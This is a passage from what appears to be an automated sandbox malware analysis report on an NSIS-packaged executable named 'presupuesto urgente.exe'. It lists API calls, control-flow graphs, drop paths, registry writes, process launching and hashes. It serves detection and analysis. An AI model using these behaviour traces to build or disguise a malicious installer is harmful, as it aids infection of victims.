                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                                                                                                      • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                      • API String ID: 1975747703-90796706
                                                                                                                                                      • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                                      • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                                                                                                      • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                                                                                      • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed; first block 4063d2-4063dd)
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                                                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                                                                                                                      • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                      • API String ID: 717251189-1230650788
                                                                                                                                                      • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                                      • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                                                                                                                      • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                                                                                                                      • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed; first block 40176f-401794)
                                                                                                                                                      APIs
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,?,00000031), ref: 004017B0
                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,?,00000031), ref: 004017D5
                                                                                                                                                        • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000,?), ref: 0040544C
                                                                                                                                                        • Part of subcall function 00405414: lstrlenW.KERNEL32(00402EEC,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EEC,00000000), ref: 0040545C
                                                                                                                                                        • Part of subcall function 00405414: lstrcatW.KERNEL32(00422708,00402EEC,00402EEC,00422708,00000000,00000000,00000000), ref: 0040546F
                                                                                                                                                        • Part of subcall function 00405414: SetWindowTextW.USER32(00422708,00422708), ref: 00405481
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054A7
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054C1
                                                                                                                                                        • Part of subcall function 00405414: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054CF
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp$C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call
                                                                                                                                                      • API String ID: 1941528284-2222187705
                                                                                                                                                      • Opcode ID: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                                      • Instruction ID: 6d789f9af123ab0f865e5502c846d56d3cd3544f1fa5f1ae7e054fd30d3333f6
                                                                                                                                                      • Opcode Fuzzy Hash: c80200c29ca938d3f9be0bc76a293d962ee4304018d07197e4f76f8e1ca0c2de
                                                                                                                                                      • Instruction Fuzzy Hash: E741D871510115BACF117BA5CD45EAF3679EF01328B20423FF922F10E1DB3C8A519AAE

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed; first block 402644-40265d)
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                                                                                        • Part of subcall function 00405F83: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405F99
                                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                      • String ID: 9
                                                                                                                                                      • API String ID: 163830602-2366072709
                                                                                                                                                      • Opcode ID: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                                      • Instruction ID: c360ee4afea2d2749c5a2d2d3cba589ababf6fe072d155cbc4f623872b1d9462
                                                                                                                                                      • Opcode Fuzzy Hash: 87cfad3e31df379bf1329a0d53b4cb21fa96f1686d8734dbec1fa7beea93af1a
                                                                                                                                                      • Instruction Fuzzy Hash: 2E51F874D0021AAADF20DFA5DA88AAEB779FF04304F50443BE511B72D0D7B899828B58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 723 40671a-40673a GetSystemDirectoryW 724 40673c 723->724 725 40673e-406740 723->725 724->725 726 406751-406753 725->726 727 406742-40674b 725->727 729 406754-406787 wsprintfW LoadLibraryExW 726->729 727->726 728 40674d-40674f 727->728 728->729
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406731
                                                                                                                                                      • wsprintfW.USER32 ref: 0040676C
                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406780
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                      • API String ID: 2200240437-1946221925

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 730 4058e3-40592e CreateDirectoryW 731 405930-405932 730->731 732 405934-405941 GetLastError 730->732 733 40595b-40595d 731->733 732->733 734 405943-405957 SetFileSecurityW 732->734 734->731 735 405959 GetLastError 734->735 735->733
                                                                                                                                                      APIs
                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040593A
                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040594F
                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405959
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                      • API String ID: 3449924974-3370423016

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 736 405ed1-405edd 737 405ede-405f12 GetTickCount GetTempFileNameW 736->737 738 405f21-405f23 737->738 739 405f14-405f16 737->739 741 405f1b-405f1e 738->741 739->737 740 405f18 739->740 740->741
                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405EEF
                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\presupuesto urgente.exe",00403487,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76893420,004036D5), ref: 00405F0A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                      • String ID: "C:\Users\user\Desktop\presupuesto urgente.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                      • API String ID: 1716503409-2533845431

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 742 10001759-10001795 call 10001b18 746 100018a6-100018a8 742->746 747 1000179b-1000179f 742->747 748 100017a1-100017a7 call 10002286 747->748 749 100017a8-100017b5 call 100022d0 747->749 748->749 754 100017e5-100017ec 749->754 755 100017b7-100017bc 749->755 756 1000180c-10001810 754->756 757 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 754->757 758 100017d7-100017da 755->758 759 100017be-100017bf 755->759 763 10001812-1000184c call 100015b4 call 100024a4 756->763 764 1000184e-10001854 call 100024a4 756->764 780 10001855-10001859 757->780 758->754 765 100017dc-100017dd call 10002b57 758->765 761 100017c1-100017c2 759->761 762 100017c7-100017c8 call 1000289c 759->762 769 100017c4-100017c5 761->769 770 100017cf-100017d5 call 10002640 761->770 776 100017cd 762->776 763->780 764->780 773 100017e2 765->773 769->754 769->762 779 100017e4 770->779 773->779 776->773 779->754 785 10001896-1000189d 780->785 786 1000185b-10001869 call 10002467 780->786 785->746 788 1000189f-100018a0 GlobalFree 785->788 792 10001881-10001888 786->792 793 1000186b-1000186e 786->793 788->746 792->785 795 1000188a-10001895 call 1000153d 792->795 793->792 794 10001870-10001878 793->794 794->792 796 1000187a-1000187b FreeLibrary 794->796 795->785 796->792
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                                                        • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8114030407.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1791698881-3916222277

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 799 4023de-40240f call 402c37 * 2 call 402cc7 806 402415-40241f 799->806 807 402abf-402ace 799->807 809 402421-40242e call 402c37 lstrlenW 806->809 810 402432-402435 806->810 809->810 811 402437-402448 call 402c15 810->811 812 402449-40244c 810->812 811->812 816 40245d-402471 RegSetValueExW 812->816 817 40244e-402458 call 4031ba 812->817 821 402473 816->821 822 402476-402557 RegCloseKey 816->822 817->816 821->822 822->807 824 402885-40288c 822->824 824->807
                                                                                                                                                      APIs
                                                                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseValuelstrlen
                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl6F0B.tmp
                                                                                                                                                      • API String ID: 2655323295-2192003154
                                                                                                                                                      • Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                                      • Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
                                                                                                                                                      • Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
                                                                                                                                                      • Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 825 402d2a-402d53 call 40621d 827 402d58-402d5a 825->827 828 402dd0-402dd4 827->828 829 402d5c-402d62 827->829 830 402d7e-402d93 RegEnumKeyW 829->830 831 402d64-402d66 830->831 832 402d95-402da7 RegCloseKey call 40678a 830->832 834 402db6-402dc2 RegCloseKey 831->834 835 402d68-402d7c call 402d2a 831->835 839 402dc4-402dca RegDeleteKeyW 832->839 840 402da9-402db4 832->840 834->828 835->830 835->832 839->828 840->828
                                                                                                                                                      APIs
                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                      • Opcode ID: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                                      • Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
                                                                                                                                                      • Opcode Fuzzy Hash: df4bd2222173038e22a6f7143f63260fc380016edffd80d7804df4238b5218be
                                                                                                                                                      • Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 926 4015c1-4015d5 call 402c37 call 405d2c 931 401631-401634 926->931 932 4015d7-4015ea call 405cae 926->932 934 401663-40224a call 401423 931->934 935 401636-401655 call 401423 call 4063b0 SetCurrentDirectoryW 931->935 939 401604-401607 call 405960 932->939 940 4015ec-4015ef 932->940 949 402885-40288c 934->949 950 402abf-402ace 934->950 935->950 955 40165b-40165e 935->955 951 40160c-40160e 939->951 940->939 943 4015f1-4015f8 call 40597d 940->943 943->939 959 4015fa-4015fd call 4058e3 943->959 949->950 952 401610-401615 951->952 953 401627-40162f 951->953 957 401624 952->957 958 401617-401622 GetFileAttributesW 952->958 953->931 953->932 955->950 957->953 958->953 958->957 962 401602 959->962 962->951
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76892EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76892EE0,00000000), ref: 00405D3A
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
                                                                                                                                                        • Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                        • Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926
                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                      Strings
                                                                                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet, xrefs: 00401640
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet
                                                                                                                                                      • API String ID: 1892508949-3950974724
                                                                                                                                                      • Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                                      • Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
                                                                                                                                                      • Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
                                                                                                                                                      • Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059BE
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004059CB
                                                                                                                                                      Strings
                                                                                                                                                      • Error launching installer, xrefs: 004059A8
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                      • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                      • Instruction ID: 7702c274cdf70951028335e9b96fa9876c0cc9a795fc840707e03dbfe60e7272
                                                                                                                                                      • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                                                      • Instruction Fuzzy Hash: B4E046F0A00209BFEB009BA4ED09F7BBAACFB04208F418431BD00F6190D774A8208A78
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                                      • Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
                                                                                                                                                      • Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
                                                                                                                                                      • Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                                      • Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
                                                                                                                                                      • Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
                                                                                                                                                      • Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8107330002.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                                      • Instruction ID: b0583babc1dad824d13d86abae56a1a356e3ceb45be48e511182641c275db258
                                                                                                                                                      • Opcode Fuzzy Hash: 7afd307a57d874939e6d1f07c4a81c11abd2b71d61e18d684fba0f23c35f734a
                                                                                                                                                      • Instruction Fuzzy Hash: 8C712471E04228CFDF28CFA8C9447ADBBB1FB44305F15806AD856BB281D7386996DF45
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.8106845840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.8106801447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106881157.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                      • Associated: 00000000.00000002.8106920914.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
